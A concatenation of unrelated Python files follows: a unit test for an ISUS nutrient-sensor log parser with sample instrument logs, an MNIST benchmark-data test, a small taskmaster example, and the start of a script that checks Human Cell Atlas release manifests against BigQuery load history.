2012/12/13 15:42:35.437 [nutnr:DLOGP1]:ISUS will start in 5 seconds.
2012/12/13 15:42:36.438 [nutnr:DLOGP1]:ISUS will start in 4 seconds.
2012/12/13 15:42:37.438 [nutnr:DLOGP1]:ISUS will start in 3 seconds.
2012/12/13 15:42:38.439 [nutnr:DLOGP1]:ISUS will start in 2 seconds.
2012/12/13 15:42:39.440 [nutnr:DLOGP1]:ISUS will start in 1 seconds.
2012/12/13 15:42:40.440 [nutnr:DLOGP1]:ISUS will start in 0 seconds.
2012/12/13 15:42:41.474 [nutnr:DLOGP1]:12/13/2012 15:42:38: Message: Entering low power suspension, waiting for trigger.
2012/12/13 15:45:26.795 [nutnr:DLOGP1]:Idle state, without initialize
2012/12/13 15:45:46.793 [nutnr:DLOGP1]:Instrument started
2012/12/13 17:51:53.412 [nutnr:DLOGP1]:S
2012/12/13 17:51:53.633 [nutnr:DLOGP1]:O
2012/12/13 17:51:53.862 [nutnr:DLOGP1]:S
2012/12/13 17:51:54.088 [nutnr:DLOGP1]:Y
2012/12/13 17:51:54.312 [nutnr:DLOGP1]:1
2012/12/13 17:51:54.548 [nutnr:DLOGP1]:T
2012/12/13 17:51:54.788 [nutnr:DLOGP1]:Y
2012/12/13 17:51:55.011 [nutnr:DLOGP1]:3
2012/12/13 17:51:55.243 [nutnr:DLOGP1]:L
2012/12/13 17:51:55.483 [nutnr:DLOGP1]:Y
2012/12/13 17:51:55.702 [nutnr:DLOGP1]:1
2012/12/13 17:51:55.928 [nutnr:DLOGP1]:D
2012/12/13 17:51:56.154 [nutnr:DLOGP1]:Y
2012/12/13 17:51:56.373 [nutnr:DLOGP1]:0
2012/12/13 17:51:56.582 [nutnr:DLOGP1]:Q
2012/12/13 17:51:56.803 [nutnr:DLOGP1]:D
2012/12/13 17:51:57.055 [nutnr:DLOGP1]:O
2012/12/13 17:51:57.308 [nutnr:DLOGP1]:Y
2012/12/13 17:51:57.529 [nutnr:DLOGP1]:5
2012/12/13 17:51:57.738 [nutnr:DLOGP1]:Q
2012/12/13 17:51:57.948 [nutnr:DLOGP1]:Q
2012/12/13 17:51:58.181 [nutnr:DLOGP1]:Y
2012/12/13 17:51:58.659 [nutnr:DLOGP1]:Y
2012/12/13 17:51:59.747 [nutnr:DLOGP1]:2012/12/13 17:51:58
2012/12/13 17:52:00.166 [nutnr:DLOGP1]:Instrument started with initialize
"""
LONG_DATA = """
2012/12/13 15:29:20.362 [nutnr:DLOGP1]:Idle state, without initialize
2012/12/13 15:30:06.455 [nutnr:DLOGP1]:S
2012/12/13 15:30:06.676 [nutnr:DLOGP1]:O
2012/12/13 15:30:06.905 [nutnr:DLOGP1]:S
2012/12/13 15:30:07.130 [nutnr:DLOGP1]:Y
2012/12/13 15:30:07.355 [nutnr:DLOGP1]:1
2012/12/13 15:30:07.590 [nutnr:DLOGP1]:T
2012/12/13 15:30:07.829 [nutnr:DLOGP1]:Y
2012/12/13 15:30:08.052 [nutnr:DLOGP1]:3
2012/12/13 15:30:08.283 [nutnr:DLOGP1]:L
2012/12/13 15:30:08.524 [nutnr:DLOGP1]:Y
2012/12/13 15:30:08.743 [nutnr:DLOGP1]:1
2012/12/13 15:30:08.969 [nutnr:DLOGP1]:D
2012/12/13 15:30:09.194 [nutnr:DLOGP1]:Y
2012/12/13 15:30:09.413 [nutnr:DLOGP1]:0
2012/12/13 15:30:09.623 [nutnr:DLOGP1]:Q
2012/12/13 15:30:09.844 [nutnr:DLOGP1]:D
2012/12/13 15:30:10.096 [nutnr:DLOGP1]:O
2012/12/13 15:30:10.349 [nutnr:DLOGP1]:Y
2012/12/13 15:30:10.570 [nutnr:DLOGP1]:5
2012/12/13 15:30:10.779 [nutnr:DLOGP1]:Q
2012/12/13 15:30:10.990 [nutnr:DLOGP1]:Q
2012/12/13 15:30:11.223 [nutnr:DLOGP1]:Y
2012/12/13 15:30:11.703 [nutnr:DLOGP1]:Y
2012/12/13 15:30:12.841 [nutnr:DLOGP1]:2012/12/13 15:30:11
2012/12/13 15:30:13.261 [nutnr:DLOGP1]:Instrument started with initialize
2012/12/13 15:30:19.270 [nutnr:DLOGP1]:onds.
2012/12/13 15:30:20.271 [nutnr:DLOGP1]:ISUS will start in 7 seconds.
2012/12/13 15:30:21.272 [nutnr:DLOGP1]:ISUS will start in 6 seconds.
2012/12/13 15:30:22.272 [nutnr:DLOGP1]:ISUS will start in 5 seconds.
2012/12/13 15:30:23.273 [nutnr:DLOGP1]:ISUS will start in 4 seconds.
2012/12/13 15:30:24.273 [nutnr:DLOGP1]:ISUS will start in 3 seconds.
2012/12/13 15:30:25.274 [nutnr:DLOGP1]:ISUS will start in 2 seconds.
2012/12/13 15:30:26.275 [nutnr:DLOGP1]:ISUS will start in 1 seconds.
2012/12/13 15:30:27.275 [nutnr:DLOGP1]:ISUS will start in 0 seconds.
2012/12/13 15:30:28.309 [nutnr:DLOGP1]:12/13/2012 15:30:26: Message: Entering low power suspension, waiting for trigger.
2012/12/13 15:30:59.889 [nutnr:DLOGP1]: ++++++++++ charged
2012/12/13 15:31:00.584 [nutnr:DLOGP1]: ON Spectrometer.
2012/12/13 15:31:01.366 [nutnr:DLOGP1]:12/13/2012 15:30:59: Message: Spectrometer powered up.
2012/12/13 15:31:01.435 [nutnr:DLOGP1]:12/13/2012 15:30:59: Message: Turning ON UV light source.
2012/12/13 15:31:06.917 [nutnr:DLOGP1]:12/13/2012 15:31:04: Message: UV light source powered up.
2012/12/13 15:31:07.053 [nutnr:DLOGP1]:12/13/2012 15:31:04: Message: Data log file is 'DATA\SCH12348.DAT'.
2012/12/13 15:31:08.726 SATNDC0239,2012348,15.518322,0.00,0.00,0.00,0.00,0.000000
2012/12/13 15:31:10.065 SATNLC0239,2012348,15.518666,-5.48,20.38,-31.12,0.59,0.000231
2012/12/13 15:31:11.405 SATNLC0239,2012348,15.519024,-6.38,24.24,-37.41,0.61,0.000191
2012/12/13 15:31:12.720 SATNLC0239,2012348,15.519397,-6.77,24.80,-38.00,0.62,0.000203
2012/12/13 15:31:14.041 SATNLC0239,2012348,15.519770,-5.28,18.39,-27.76,0.59,0.000212
2012/12/13 15:31:15.350 SATNLC0239,2012348,15.520128,-7.57,32.65,-51.28,0.62,0.000186
2012/12/13 15:31:16.695 SATNLC0239,2012348,15.520501,-6.17,24.43,-37.71,0.60,0.000218
2012/12/13 15:31:18.015 SATNLC0239,2012348,15.520875,-5.59,18.68,-28.01,0.60,0.000166
2012/12/13 15:31:19.342 SATNLC0239,2012348,15.521232,-7.30,30.87,-48.21,0.62,0.000235
2012/12/13 15:31:20.704 SATNLC0239,2012348,15.521605,-7.52,31.35,-49.03,0.63,0.000240
2012/12/13 15:42:25.429 [nutnr:DLOGP1]:ISUS will start in 15 seconds.
2012/12/13 15:42:26.430 [nutnr:DLOGP1]:ISUS will start in 14 seconds.
2012/12/13 15:42:27.431 [nutnr:DLOGP1]:ISUS will start in 13 seconds.
2012/12/13 15:42:28.431 [nutnr:DLOGP1]:ISUS will start in 12 seconds.
2012/12/13 15:42:29.432 [nutnr:DLOGP1]:ISUS will start in 11 seconds.
2012/12/13 15:42:30.433 [nutnr:DLOGP1]:ISUS will start in 10 seconds.
2012/12/13 15:42:31.434 [nutnr:DLOGP1]:ISUS will start in 9 seconds.
2012/12/13 15:42:32.435 [nutnr:DLOGP1]:ISUS will start in 8 seconds.
2012/12/13 15:42:33.436 [nutnr:DLOGP1]:ISUS will start in 7 seconds.
2012/12/13 15:42:34.436 [nutnr:DLOGP1]:ISUS will start in 6 seconds.
2012/12/13 15:42:35.437 [nutnr:DLOGP1]:ISUS will start in 5 seconds.
2012/12/13 15:42:36.438 [nutnr:DLOGP1]:ISUS will start in 4 seconds.
2012/12/13 15:42:37.438 [nutnr:DLOGP1]:ISUS will start in 3 seconds.
2012/12/13 15:42:38.439 [nutnr:DLOGP1]:ISUS will start in 2 seconds.
2012/12/13 15:42:39.440 [nutnr:DLOGP1]:ISUS will start in 1 seconds.
2012/12/13 15:42:40.440 [nutnr:DLOGP1]:ISUS will start in 0 seconds.
2012/12/13 15:42:41.474 [nutnr:DLOGP1]:12/13/2012 15:42:38: Message: Entering low power suspension, waiting for trigger.
2012/12/13 15:45:26.795 [nutnr:DLOGP1]:Idle state, without initialize
2012/12/13 15:45:46.793 [nutnr:DLOGP1]:Instrument started
2012/12/13 17:51:53.412 [nutnr:DLOGP1]:S
2012/12/13 17:51:53.633 [nutnr:DLOGP1]:O
2012/12/13 17:51:53.862 [nutnr:DLOGP1]:S
2012/12/13 17:51:54.088 [nutnr:DLOGP1]:Y
2012/12/13 17:51:54.312 [nutnr:DLOGP1]:1
2012/12/13 17:51:54.548 [nutnr:DLOGP1]:T
2012/12/13 17:51:54.788 [nutnr:DLOGP1]:Y
2012/12/13 17:51:55.011 [nutnr:DLOGP1]:3
2012/12/13 17:51:55.243 [nutnr:DLOGP1]:L
2012/12/13 17:51:55.483 [nutnr:DLOGP1]:Y
2012/12/13 17:51:55.702 [nutnr:DLOGP1]:1
2012/12/13 17:51:55.928 [nutnr:DLOGP1]:D
2012/12/13 17:51:56.154 [nutnr:DLOGP1]:Y
2012/12/13 17:51:56.373 [nutnr:DLOGP1]:0
2012/12/13 17:51:56.582 [nutnr:DLOGP1]:Q
2012/12/13 17:51:56.803 [nutnr:DLOGP1]:D
2012/12/13 17:51:57.055 [nutnr:DLOGP1]:O
2012/12/13 17:51:57.308 [nutnr:DLOGP1]:Y
2012/12/13 17:51:57.529 [nutnr:DLOGP1]:5
2012/12/13 17:51:57.738 [nutnr:DLOGP1]:Q
2012/12/13 17:51:57.948 [nutnr:DLOGP1]:Q
2012/12/13 17:51:58.181 [nutnr:DLOGP1]:Y
2012/12/13 17:51:58.659 [nutnr:DLOGP1]:Y
2012/12/13 17:51:59.747 [nutnr:DLOGP1]:2012/12/13 17:51:58
2012/12/13 17:52:00.166 [nutnr:DLOGP1]:Instrument started with initialize
"""
BAD_TEST_DATA = """
2012/12/13 15:29:20.362 [nutnr:DLOGP1]:Idle state, without initialize
2012/12/13 15:30:06.455 [nutnr:DLOGP1]:S
2012/12/13 15:30:06.676 [nutnr:DLOGP1]:O
2012/12/13 15:30:06.905 [nutnr:DLOGP1]:S
2012/12/13 15:30:07.130 [nutnr:DLOGP1]:Y
2012/12/13 15:30:07.355 [nutnr:DLOGP1]:1
2012/12/13 15:30:07.590 [nutnr:DLOGP1]:T
2012/12/13 15:30:07.829 [nutnr:DLOGP1]:Y
2012/12/13 15:30:08.052 [nutnr:DLOGP1]:3
2012/12/13 15:30:08.283 [nutnr:DLOGP1]:L
2012/12/13 15:30:08.524 [nutnr:DLOGP1]:Y
2012/12/13 15:30:08.743 [nutnr:DLOGP1]:1
2012/12/13 15:30:08.969 [nutnr:DLOGP1]:D
2012/12/13 15:30:09.194 [nutnr:DLOGP1]:Y
2012/12/13 15:30:09.413 [nutnr:DLOGP1]:0
2012/12/13 15:30:09.623 [nutnr:DLOGP1]:Q
2012/12/13 15:30:09.844 [nutnr:DLOGP1]:D
2012/12/13 15:30:10.096 [nutnr:DLOGP1]:O
2012/12/13 15:30:10.349 [nutnr:DLOGP1]:Y
2012/12/13 15:30:10.570 [nutnr:DLOGP1]:5
2012/12/13 15:30:10.779 [nutnr:DLOGP1]:Q
2012/12/13 15:30:10.990 [nutnr:DLOGP1]:Q
2012/12/13 15:30:11.223 [nutnr:DLOGP1]:Y
2012/12/13 15:30:11.703 [nutnr:DLOGP1]:Y
2012/12/13 15:30:12.841 [nutnr:DLOGP1]:2012/12/13 15:30:11
2012/12/13 15:30:13.261 [nutnr:DLOGP1]:Instrument started with initialize
2012/12/13 15:30:19.270 [nutnr:DLOGP1]:onds.
2012/12/13 15:30:20.271 [nutnr:DLOGP1]:ISUS will start in 7 seconds.
2012/12/13 15:30:21.272 [nutnr:DLOGP1]:ISUS will start in 6 seconds.
2012/12/13 15:30:22.272 [nutnr:DLOGP1]:ISUS will start in 5 seconds.
2012/12/13 15:30:23.273 [nutnr:DLOGP1]:ISUS will start in 4 seconds.
2012/12/13 15:30:24.273 [nutnr:DLOGP1]:ISUS will start in 3 seconds.
2012/12/13 15:30:25.274 [nutnr:DLOGP1]:ISUS will start in 2 seconds.
2012/12/13 15:30:26.275 [nutnr:DLOGP1]:ISUS will start in 1 seconds.
2012/12/13 15:30:27.275 [nutnr:DLOGP1]:ISUS will start in 0 seconds.
2012/12/13 15:30:28.309 [nutnr:DLOGP1]:12/13/2012 15:30:26: Message: Entering low power suspension, waiting for trigger.
2012/12/13 15:30:59.889 [nutnr:DLOGP1]: ++++++++++ charged
2012/12/13 15:31:00.584 [nutnr:DLOGP1]: ON Spectrometer.
2012/12/13 15:31:01.366 [nutnr:DLOGP1]:12/13/2012 15:30:59: Message: Spectrometer powered up.
2012/12/13 15:31:01.435 [nutnr:DLOGP1]:12/13/2012 15:30:59: Message: Turning ON UV light source.
2012/12/13 15:31:06.917 [nutnr:DLOGP1]:12/13/2012 15:31:04: Message: UV light source powered up.
2012/12/13 15:31:07.053 [nutnr:DLOGP1]:12/13/2012 15:31:04: Message: Data log file is 'DATA\SCH12348.DAT'.
2012\12\13 15:31:08.726 SATNDC0239,2012348,15.518322,0.00,0.00,0.00,0.00,0.000000
SATNLC0239,2012348,15.518666,-5.48,20.38,-31.12,0.59,0.000231
2012/12/13 15:31:11.405 SATNLC0239,2012348,15.519024,-6.38,24.24,-37.41,0.61,0.000191
2012/12/13 15:31:12.720 SATNLC0239,2012348,15.519397,-6.77,24.80,-38.00,0.62,0.000203
2012/12/13 15:42:25.429 [nutnr:DLOGP1]:ISUS will start in 15 seconds.
2012/12/13 15:42:26.430 [nutnr:DLOGP1]:ISUS will start in 14 seconds.
2012/12/13 15:42:27.431 [nutnr:DLOGP1]:ISUS will start in 13 seconds.
2012/12/13 15:42:28.431 [nutnr:DLOGP1]:ISUS will start in 12 seconds.
2012/12/13 15:42:29.432 [nutnr:DLOGP1]:ISUS will start in 11 seconds.
2012/12/13 15:42:30.433 [nutnr:DLOGP1]:ISUS will start in 10 seconds.
2012/12/13 15:42:31.434 [nutnr:DLOGP1]:ISUS will start in 9 seconds.
2012/12/13 15:42:32.435 [nutnr:DLOGP1]:ISUS will start in 8 seconds.
2012/12/13 15:42:33.436 [nutnr:DLOGP1]:ISUS will start in 7 seconds.
2012/12/13 15:42:34.436 [nutnr:DLOGP1]:ISUS will start in 6 seconds.
2012/12/13 15:42:35.437 [nutnr:DLOGP1]:ISUS will start in 5 seconds.
2012/12/13 15:42:36.438 [nutnr:DLOGP1]:ISUS will start in 4 seconds.
2012/12/13 15:42:37.438 [nutnr:DLOGP1]:ISUS will start in 3 seconds.
2012/12/13 15:42:38.439 [nutnr:DLOGP1]:ISUS will start in 2 seconds.
2012/12/13 15:42:39.440 [nutnr:DLOGP1]:ISUS will start in 1 seconds.
2012/12/13 15:42:40.440 [nutnr:DLOGP1]:ISUS will start in 0 seconds.
2012/12/13 15:42:41.474 [nutnr:DLOGP1]:12/13/2012 15:42:38: Message: Entering low power suspension, waiting for trigger.
2012/12/13 15:45:26.795 [nutnr:DLOGP1]:Idle state, without initialize
2012/12/13 15:45:46.793 [nutnr:DLOGP1]:Instrument started
2012/12/13 17:51:53.412 [nutnr:DLOGP1]:S
2012/12/13 17:51:53.633 [nutnr:DLOGP1]:O
2012/12/13 17:51:53.862 [nutnr:DLOGP1]:S
2012/12/13 17:51:54.088 [nutnr:DLOGP1]:Y
2012/12/13 17:51:54.312 [nutnr:DLOGP1]:1
2012/12/13 17:51:54.548 [nutnr:DLOGP1]:T
2012/12/13 17:51:54.788 [nutnr:DLOGP1]:Y
2012/12/13 17:51:55.011 [nutnr:DLOGP1]:3
2012/12/13 17:51:55.243 [nutnr:DLOGP1]:L
2012/12/13 17:51:55.483 [nutnr:DLOGP1]:Y
2012/12/13 17:51:55.702 [nutnr:DLOGP1]:1
2012/12/13 17:51:55.928 [nutnr:DLOGP1]:D
2012/12/13 17:51:56.154 [nutnr:DLOGP1]:Y
2012/12/13 17:51:56.373 [nutnr:DLOGP1]:0
2012/12/13 17:51:56.582 [nutnr:DLOGP1]:Q
2012/12/13 17:51:56.803 [nutnr:DLOGP1]:D
2012/12/13 17:51:57.055 [nutnr:DLOGP1]:O
2012/12/13 17:51:57.308 [nutnr:DLOGP1]:Y
2012/12/13 17:51:57.529 [nutnr:DLOGP1]:5
2012/12/13 17:51:57.738 [nutnr:DLOGP1]:Q
2012/12/13 17:51:57.948 [nutnr:DLOGP1]:Q
2012/12/13 17:51:58.181 [nutnr:DLOGP1]:Y
2012/12/13 17:51:58.659 [nutnr:DLOGP1]:Y
2012/12/13 17:51:59.747 [nutnr:DLOGP1]:2012/12/13 17:51:58
2012/12/13 17:52:00.166 [nutnr:DLOGP1]:Instrument started with initialize
"""
def state_callback(self, pos, file_ingested):
""" Call back method to watch what comes in via the position callback """
log.trace("SETTING state_callback_value to " + str(pos))
self.position_callback_value = pos
self.file_ingested = file_ingested
def pub_callback(self, pub):
""" Call back method to watch what comes in via the publish callback """
log.trace("SETTING publish_callback_value to " + str(pub))
self.publish_callback_value = pub
def setUp(self):
ParserUnitTestCase.setUp(self)
self.config = {
DataSetDriverConfigKeys.PARTICLE_MODULE: 'mi.dataset.parser.nutnrb',
DataSetDriverConfigKeys.PARTICLE_CLASS: 'NutnrbDataParticle'
}
# not a DataSourceLocation...its just the parser
self.position = {StateKey.POSITION: 0}
self.particle_a = NutnrbDataParticle("2012/12/13 15:31:08.726 SATNDC0239,2012348,15.518322,0.00,0.00,0.00,0.00,0.000000\n")
self.particle_b = NutnrbDataParticle("2012/12/13 15:31:10.065 SATNLC0239,2012348,15.518666,-5.48,20.38,-31.12,0.59,0.000231\n")
self.particle_c = NutnrbDataParticle("2012/12/13 15:31:11.405 SATNLC0239,2012348,15.519024,-6.38,24.24,-37.41,0.61,0.000191\n")
self.particle_d = NutnrbDataParticle("2012/12/13 15:31:12.720 SATNLC0239,2012348,15.519397,-6.77,24.80,-38.00,0.62,0.000203\n")
self.particle_e = NutnrbDataParticle("2012/12/13 15:31:14.041 SATNLC0239,2012348,15.519770,-5.28,18.39,-27.76,0.59,0.000212\n")
self.particle_z = NutnrbDataParticle("2012/12/13 15:31:20.704 SATNLC0239,2012348,15.521605,-7.52,31.35,-49.03,0.63,0.000240\n")
self.position_callback_value = None
self.publish_callback_value = None
def assert_result(self, result, position, particle):
self.assertEqual(result, [particle])
self.assertEqual(self.parser._state[StateKey.POSITION], position)
self.assertEqual(self.position_callback_value[StateKey.POSITION], position)
self.assert_(isinstance(self.publish_callback_value, list))
self.assertEqual(self.publish_callback_value[0], particle)
def test_happy_path(self):
"""
Test the happy path of operations where the parser takes the input
and spits out a valid data particle given the stream.
"""
new_state = {}
self.stream_handle = StringIO(NutnrbParserUnitTestCase.TEST_DATA)
self.parser = NutnrbParser(self.config, new_state, self.stream_handle,
self.state_callback, self.pub_callback)
result = self.parser.get_records(1)
self.assert_result(result, 2458, self.particle_a)
result = self.parser.get_records(1)
self.assert_result(result, 2544, self.particle_b)
result = self.parser.get_records(1)
self.assert_result(result, 2630, self.particle_c)
result = self.parser.get_records(1)
self.assert_result(result, 2716, self.particle_d)
# no data left, dont move the position
result = self.parser.get_records(1)
self.assertEqual(result, [])
self.assertEqual(self.parser._state[StateKey.POSITION], 2716)
self.assertEqual(self.position_callback_value[StateKey.POSITION], 2716)
self.assert_(isinstance(self.publish_callback_value, list))
self.assertEqual(self.publish_callback_value[0], self.particle_d)
def test_get_many(self):
new_state = {}
self.stream_handle = StringIO(NutnrbParserUnitTestCase.TEST_DATA)
self.parser = NutnrbParser(self.config, new_state, self.stream_handle,
self.state_callback, self.pub_callback)
result = self.parser.get_records(2)
self.assertEqual(result, [self.particle_a, self.particle_b])
self.assertEqual(self.parser._state[StateKey.POSITION], 2544)
self.assertEqual(self.position_callback_value[StateKey.POSITION], 2544)
self.assertEqual(self.publish_callback_value[0], self.particle_a)
self.assertEqual(self.publish_callback_value[1], self.particle_b)
def test_bad_data(self):
# There's a bad sample in the data! Ack! Skip it!
new_state = {}
self.stream_handle = StringIO(NutnrbParserUnitTestCase.BAD_TEST_DATA)
self.parser = NutnrbParser(self.config, new_state, self.stream_handle,
self.state_callback, self.pub_callback)
result = self.parser.get_records(1)
self.assert_result(result, 2603, self.particle_c)
def test_long_stream(self):
new_state = {}
self.stream_handle = StringIO(NutnrbParserUnitTestCase.LONG_DATA)
self.parser = NutnrbParser(self.config, new_state, self.stream_handle,
self.state_callback, self.pub_callback)
result = self.parser.get_records(11)
self.assertEqual(result[-1], self.particle_z)
self.assertEqual(self.parser._state[StateKey.POSITION], 3232)
self.assertEqual(self.position_callback_value[StateKey.POSITION], 3232)
self.assertEqual(self.publish_callback_value[-1], self.particle_z)
def test_mid_state_start(self):
new_state = {StateKey.POSITION:2628}
self.stream_handle = StringIO(NutnrbParserUnitTestCase.TEST_DATA)
self.parser = NutnrbParser(self.config, new_state, self.stream_handle,
self.state_callback, self.pub_callback)
result = self.parser.get_records(1)
self.assert_result(result, 2716, self.particle_d)
def reset_parser(self, state = {}):
self.state_callback_values = []
self.publish_callback_values = []
self.stream_handle = StringIO(NutnrbParserUnitTestCase.TEST_DATA)
self.parser = NutnrbParser(self.config, state, self.stream_handle,
self.state_callback, self.pub_callback)
def test_set_state(self):
new_state = {StateKey.POSITION: 2544}
self.stream_handle = StringIO(NutnrbParserUnitTestCase.TEST_DATA)
self.parser = NutnrbParser(self.config, self.position, self.stream_handle,
self.state_callback, self.pub_callback)
result = self.parser.get_records(1)
self.assert_result(result, 2458, self.particle_a)
self.reset_parser(new_state)
self.parser.set_state(new_state) # seek to after particle_b
result = self.parser.get_records(1)
#
# If particles C and D appear, but the position is off
# it is because you are not consuming newlines in your
# DATA_REGEX pattern
#
self.assert_result(result, 2630, self.particle_c)
result = self.parser.get_records(1)
self.assert_result(result, 2716, self.particle_d)
| 52.087912 | 135 | 0.713966 | 22,968 | 0.969114 | 0 | 0 | 23,064 | 0.973165 | 0 | 0 | 17,530 | 0.739662 |
5e21a247589e39c95147d3bf4195c32dff706fc9 | 1,252 | py | Python | wp/tests/data/test_benchmark.py | ExLeonem/master-thesis-code | 559ad55f15c99772358384146bd30dd517b1dfe8 | [
"MIT"
] | null | null | null | wp/tests/data/test_benchmark.py | ExLeonem/master-thesis-code | 559ad55f15c99772358384146bd30dd517b1dfe8 | [
"MIT"
] | null | null | null | wp/tests/data/test_benchmark.py | ExLeonem/master-thesis-code | 559ad55f15c99772358384146bd30dd517b1dfe8 | [
"MIT"
] | null | null | null |
import numpy as np
import pytest
import os
from modules.data import BenchmarkData, DataSetType
DIR_PATH = os.path.dirname(os.path.realpath(__file__))
BASE_PATH = os.path.join(DIR_PATH, "..", "..")
MNIST_PATH = os.path.join(BASE_PATH, "datasets", "mnist")
class TestBenchmarkData:
"""
Test functionality of BenchmarkData.
*To perform this test data needs to be present*
"""
def test_load_mnist_data(self):
""" Test MNIST loader implementation """
mnist_data = BenchmarkData(DataSetType.MNIST, MNIST_PATH)
assert len(mnist_data.inputs) != 0
assert len(mnist_data.targets) != 0
assert len(mnist_data.inputs) == len(mnist_data.targets)
def test_subset_class_loader(self):
num_classes = 3
mnist_data = BenchmarkData(DataSetType.MNIST, MNIST_PATH, classes=num_classes)
unique_targets = np.unique(mnist_data.targets)
assert len(unique_targets) == num_classes
def test_load_without_path(self):
with pytest.raises(TypeError) as e:
mnist_data = BenchmarkData(DataSetType.MNIST)
def test_load_non_existent_dataset(self):
with pytest.raises(Exception) as e:
BenchmarkData("Hello", MNIST_PATH) | 30.536585 | 86 | 0.685304 | 994 | 0.79393 | 0 | 0 | 0 | 0 | 0 | 0 | 185 | 0.147764 |
5e2225346054d6facdf73eafd32caba7ecf7dd78 | 342 | py | Python | src/taskmaster/example.py | alex/taskmaster | 04a03bf0853facf318ce98192db6389cdaaefe3c | [
"Apache-2.0"
] | 2 | 2015-11-08T12:45:38.000Z | 2017-06-03T09:16:16.000Z | src/taskmaster/example.py | alex/taskmaster | 04a03bf0853facf318ce98192db6389cdaaefe3c | [
"Apache-2.0"
] | null | null | null | src/taskmaster/example.py | alex/taskmaster | 04a03bf0853facf318ce98192db6389cdaaefe3c | [
"Apache-2.0"
] | null | null | null | """
taskmaster.example
~~~~~~~~~~~~~~~~~~
:copyright: (c) 2010 DISQUS.
:license: Apache License 2.0, see LICENSE for more details.
"""
def get_jobs(last=0):
# last_job would be sent if state was resumed
# from a previous run
for i in xrange(last, 20000):
yield i
def handle_job(i):
pass
# print "Got %r!" % i
| 17.1 | 59 | 0.602339 | 0 | 0 | 147 | 0.429825 | 0 | 0 | 0 | 0 | 222 | 0.649123 |
5e23a07b704af65d2c0b32c7f204c45be14b5405 | 12,567 | py | Python | orchestration/hca_manage/verify_release_manifest.py | DataBiosphere/hca-ingest | 1f5e8ad7450ff8caff3bb8c8d6b8f7acd8a37f68 | [
"BSD-3-Clause"
] | 5 | 2020-05-07T14:18:53.000Z | 2021-03-31T21:30:37.000Z | orchestration/hca_manage/verify_release_manifest.py | DataBiosphere/hca-ingest | 1f5e8ad7450ff8caff3bb8c8d6b8f7acd8a37f68 | [
"BSD-3-Clause"
] | 232 | 2020-05-28T16:47:22.000Z | 2022-03-08T21:08:42.000Z | orchestration/hca_manage/verify_release_manifest.py | DataBiosphere/hca-ingest | 1f5e8ad7450ff8caff3bb8c8d6b8f7acd8a37f68 | [
"BSD-3-Clause"
] | 1 | 2020-08-19T16:33:54.000Z | 2020-08-19T16:33:54.000Z | """
Given a file containing a list of constituent staging dirs for a DCP release (aka a manifest),
verify that data has been loaded from each of them to the target DCP dataset and the count of loaded files
matches the # in the staging area.
Files are determined to be loaded if they exist at the desired target path and crc as defined in the staging
areas descriptors. It's possible that an expected file was loaded by another staging dir (i.e,. they both
contain the same file). While this is discouraged, it's technically possible and we need to accommodate that.
So, we check if the target path was loaded, disregarding the source staging dir.
Additionally, this will check that metadata was loaded properly (including links) by pull the entity_id, version and
content from the files in GS and checking that the expected row is present in the given dataset. If a newer version
is present in the repo than is staged, we consider that valid.
Example invocation:
python verify_release_manifest.py -f testing.csv -g fake-gs-project -b fake-bq-project -d fake-dataset
"""
import argparse
import json
import logging
import sys
from dataclasses import dataclass
from datetime import datetime
from collections import defaultdict
from functools import partial
from multiprocessing import Pool
from typing import Tuple
from urllib.parse import urlparse
from dateutil import parser
from google.cloud import bigquery, storage
from google.cloud.storage.client import Client
from dagster_utils.contrib.google import get_credentials
from hca_orchestration.solids.load_hca.data_files.load_data_metadata_files import FileMetadataTypes
from hca_orchestration.solids.load_hca.non_file_metadata.load_non_file_metadata import NonFileMetadataTypes
from hca_orchestration.support.dates import parse_version_to_datetime
logging.basicConfig(level=logging.INFO, format='%(message)s')
@dataclass(frozen=True)
class PathWithCrc:
path: str
crc32c: str
@dataclass(frozen=True)
class StagingAreaVerificationResult:
has_metadata_errors: bool
has_file_errors: bool
def has_errors(self) -> bool:
return self.has_metadata_errors or self.has_file_errors
def get_staging_area_file_descriptors(storage_client: Client, staging_areas: set[str]) -> dict[str, set[PathWithCrc]]:
"""
Given a set of GS staging areas, return the downloaded descriptors present in each area
"""
expected: dict[str, set[PathWithCrc]] = defaultdict(set[PathWithCrc])
for staging_area in staging_areas:
url = urlparse(staging_area)
for file_type in FileMetadataTypes:
prefix = f"{url.path.lstrip('/')}/descriptors/{file_type.value}"
blobs = list(storage_client.list_blobs(url.netloc, prefix=prefix))
for blob in blobs:
parsed = json.loads(blob.download_as_text())
path_with_crc = PathWithCrc(target_path_from_descriptor(parsed), parsed["crc32c"])
expected[staging_area].add(path_with_crc)
return expected
def target_path_from_descriptor(descriptor: dict[str, str]) -> str:
return f"/v1/{descriptor['file_id']}/{descriptor['crc32c']}/{descriptor['file_name']}"
def find_files_in_load_history(bq_project: str, dataset: str,
areas: dict[str, set[PathWithCrc]]) -> dict[str, set[PathWithCrc]]:
client = bigquery.Client(project=bq_project)
loaded_paths = {}
for area, paths_with_crc in areas.items():
logging.debug(f"\tPulling loaded files for area {area}...")
target_paths = [path_with_crc.path for path_with_crc in paths_with_crc]
query = f"""
SELECT target_path, checksum_crc32c
FROM `datarepo_{dataset}.datarepo_load_history` dlh
WHERE state = 'succeeded'
AND target_path IN UNNEST(@paths)
"""
job_config = bigquery.QueryJobConfig(
query_parameters=[
bigquery.ArrayQueryParameter("paths", "STRING", target_paths),
]
)
query_job = client.query(query, job_config=job_config)
loaded_paths[area] = {PathWithCrc(row["target_path"], row["checksum_crc32c"]) for row in
query_job}
return loaded_paths
def parse_manifest_file(manifest_file: str) -> list[str]:
with open(manifest_file) as manifest:
# some of the staging areas submitted via the form need slight cleanup
return [area.rstrip('\n/').strip() for area in manifest]
def process_staging_area(area: str, gs_project: str, bq_project: str, dataset: str,
release_cutoff: datetime) -> StagingAreaVerificationResult:
logging.info(f"Processing staging area = {area}")
creds = get_credentials()
storage_client = storage.Client(project=gs_project, credentials=creds)
expected_loaded_paths = get_staging_area_file_descriptors(storage_client, {area})
loaded_paths_by_staging_area = find_files_in_load_history(bq_project, dataset, expected_loaded_paths)
has_file_error = False
for area, paths_with_crc in expected_loaded_paths.items():
load_paths_for_staging_area = loaded_paths_by_staging_area[area]
diff = paths_with_crc - load_paths_for_staging_area
loaded = len(load_paths_for_staging_area)
staged = len(paths_with_crc)
if diff:
logging.warning(
f"❌ area = {area} - (data files) Mismatched loaded paths; expected files loaded = {staged}, actual loaded = {loaded}"
)
logging.debug(diff)
has_file_error = True
else:
logging.info(
f"✅ area = {area} - (data files) expected files loaded = {staged}, actual loaded = {loaded}"
)
has_metadata_error = verify_metadata(area, bq_project, dataset, release_cutoff)
